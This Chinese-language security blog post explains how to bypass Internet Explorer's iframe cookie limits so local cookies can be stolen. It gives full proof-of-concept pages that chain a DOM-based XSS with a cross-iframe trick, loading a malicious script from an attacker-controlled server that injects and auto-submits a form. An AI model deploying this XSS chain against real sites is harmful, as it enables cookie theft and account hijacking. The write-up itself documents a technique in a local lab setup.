|
[图文]突破IE安全限制获取iframe子框架内的本地cookie
突破IFRAME限制的思路:(以下都是在IE环境中)
由于页面里的iframe都是发送的session cookie,所以子框架页面里本身是只有一个session cookie的,我们无法通过在子框架里执行js的方法来获取本地cookie,无中生有的事情是干不出来的。
了解这一原理后,思路就很明确了:想办法新起一个不受限制的窗口,从而获取本地cookie。
具体来说,有这么两个办法:
1、 使用window.open打开一个新窗口
2、 回到父窗口,让其打开一个新窗口
在子框架中,使用window.open()确实可以发送本地cookie,但是问题是浏览器一般会限制页面弹窗口,会被拦截,所以这个方法比较囧~~,不是个好办法。
而第二个办法,回到父窗口去打开新窗口,就涉及到一个突破iframe执行脚本的问题,而这个问题在我的前一篇Cross Iframe Trick 里已经解决了,所以我们的方法就呼之欲出了。
利用Cross Iframe Trick突破iframe限制获取子框架cookie:
Cross Iframe的最大贡献就在于他可以绕过前面提到的iframe的限制,在父域或者子框架里获取对象,执行脚本。
当一个页面很难突破时,如果他包含了一个存在弱点的iframe页面,则可能会带来灾难性的结果。
我相信真正精通脚本攻击的人是能够看到它的用处和优势的。
环境如下:(绑定127.0.0.1 www.baidu.com)
http://www.a.com/1.html 是我们要攻击的页面,它包含了一个存在弱点的iframe,用户只会去浏览这个页面
http://www.baidu.com/3.html 是我们已经控制的页面,他作为一个iframe被1.html所包含。在这里是iframe proxy
http://www.a.com/4.html 是www.a.com上的一个存在XSS漏洞的页面,一般情况下用户不会去访问它!
http://www.b.com/4.js 这是攻击者自己的服务器上的一个恶意脚本,将被XSS攻击远程载入4.html中。
由于用户只会浏览www.a.com/1.html,所以我们要通过脚本攻击,从www.a.com/1.html里获取用户在www.baidu.com/3.html的本地cookie。
www.a.com/1.html的代码如下:
| 以下是引用片段: ---------------------------------- 我是聪明的分割线 ------------------------------------------- <script> // 函数tt1 ,在最后将被4.html注入参数 function tt1(fvck){ alert("tt1() and args= "+fvck); document.write("<input id=\"bbb\" value=\’test1"+fvck+"\’ >"); } </script> <body> <iframe id="tt2_3" src="http://www.baidu.com/3.html" width="300" height="300" ></iframe> </body> ---------------------------------- 我是聪明的分割线 ------------------------------------------- 它包含了一个iframe页面 www.baidu.com/3.html 的代码为: ---------------------------------- 我是聪明的分割线 ------------------------------------------- <html> <body> <script> //parent.location.href=new String("javascript:alert(document.cookie)"); //parent.location.href="http://www.sohu.com"; alert("3.html in iframe and cookie="+document.cookie); // iframe proxy: 创建一个动态iframe,并利用4.html里的XSS漏洞 var tt1_4 = document.createElement("iframe"); tt1_4.src = "http://www.A.com/4.html#’ ><script src=\"http://www.b.com/4.js\"><\/script><\’"; document.body.appendChild(tt1_4); </script> </body> </html> ---------------------------------- 我是聪明的分割线 ------------------------------------------- 3.html是我们的iframe proxy,利用它来完成在www.a.com里执行脚本的工作。 www.a.com/4.html 的代码为: ---------------------------------- 我是聪明的分割线 ------------------------------------------- <html> <script> // 一个基于DOM的XSS漏洞 document.write("<input id=\"aaa\" value=\’test4"+window.location.href+"\’ >"); //window.open("http://www.baidu.com/4.html"); 会带上cookie </script> <body> This is 4.html! <!-- 把这里的注释去掉可以用来测试,这样发送的还是session cookie! <form id="form1" method="post" action="http://www.baidu.com/2.html" > <img src="/Article/UploadFiles/200809/20080902102622405.jpg" onload=submitpost4();> </form> <script>function submitpost4(){ document.forms[0].submit(); }</script> --> </body> </html> ---------------------------------- 我是聪明的分割线 ------------------------------------------- www.b.com/4.js 的代码为: ---------------------------------- 我是聪明的分割线 ------------------------------------------- alert("4.js is loaded!"); top.tt1(’\’><form id=\"form1\" method=\"post\" action=\"http://www.baidu.com/2.html\" ><img src=\"/Article/UploadFiles/200809/20080902102622405.jpg\" onload=submitpost4();></form><script>function submitpost4(){ document.forms[0].submit(); }</script><\!-- \’’); ---------------------------------- 我是聪明的分割线 ------------------------------------------- 4.js才是我们真正利用XSS漏洞和Cross Iframe Trick来新起一个窗口,从而获取本地cookie的方法。 www.baidu.com/2.html的代码很简单,他的作用是查看当前的cookie: ---------------------------------- 我是聪明的分割线 ------------------------------------------- <script> alert("2.html cookie="+document.cookie); </script> ---------------------------------- 我是聪明的分割线 ------------------------------------------- |
4.js动态调用 www.a.com/1.html 里的 tt1() 函数,并篡改参数,写入一个form,利用js动态提交该表单,这时候提交的表单,就自动带上了本地cookie了
| 新云CMS Online.asp页面过滤不严 | 02-26 |
| 对网软网上购物系统的漏洞分析 | 01-09 |
| 测试SQL防注入脚本 | 12-21 |
| Google Xss又出跨站新漏洞 | 11-06 |
| 一次简单的html injection导致的 | 11-06 |
| 风讯、科讯漏洞利用 | 11-01 |
| Adobe pdf reader URI利用方式浅 | 10-23 |
| 超星阅览器的最新0DAY | 10-19 |
| 运用SQL Injection做数据库渗透的 | 09-22 |
| sa-blog 0day | 09-22 |
| HTML注入的一些简单想法 | 09-10 |
| 网站登陆接口的攻与防 | 09-04 |
您现在的位置: